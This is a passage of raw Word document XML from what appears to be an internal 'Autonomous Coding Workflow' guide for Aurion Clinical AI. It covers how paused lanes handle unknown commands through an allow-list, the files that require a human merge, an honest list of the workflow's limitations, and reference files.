          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A lane has hit an unknown command. The lane is paused, NOT blocked globally — the other lane keeps running. Read the command, decide:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Genuinely-safe command → approve once + add a pattern to the allow-list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Suspicious command → deny + investigate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is the system working as designed; treat allow-list growth as earned trust, not a chore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pilot-specific guardrails</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Anything touching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>app/api/v1/screen.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>app/api/v1/frames.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>MaskingPipeline.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, or audit-log writers gets automatic human-merge requirement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 1 &lt; 30 s and Stage 2 &lt; 5 min SLAs are checked by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>/verify-acceptance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>pilot_metrics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Descriptive-mode enforcement is non-negotiable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>@compliance-checker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> blocks PR creation on any interpretive/diagnostic language.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>18. What this workflow does NOT do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Honest list of limitations so expectations stay calibrated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not own product decisions. Backlog ordering is human-authored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not touch prod infra. Ever. By design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not handle clinical validation. PHI compliance is mechanically enforced but real clinical validation studies are out of scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not replace code review for novel architecture. You still read the PR before auto-merge fires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not catch every bug. It catches what tests, simplify, and acceptance criteria catch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not survive a wedged Claude Code process. Restart the driver; state is preserved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not parallelize vertical slices. Backend + iOS slices that ship together stay sequential in one lane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Does not auto-approve unknown commands. Permission auto-mode is NOT set; allow-list grows by observed need.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>19. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>CLAUDE.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the constraints this workflow enforces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>aurion-mvp-scope-backlog.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — source of backlog items.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>MVP_Effort_Estimation_Aurion.xlsx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — current effort rollup and target demo date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>memory/MEMORY.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>memory/autonomous_authority.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — durable cross-session state.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Last reviewed: 2026-05-14. Update this document when the workflow changes, not the other way around.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8"/>
      </w:rPr>
      <w:t>aurionclinical.ai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i w:val="0"/>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
      </w:rPr>
      <w:t>AURION CLINICAL AI  ·  Autonomous Coding Workflow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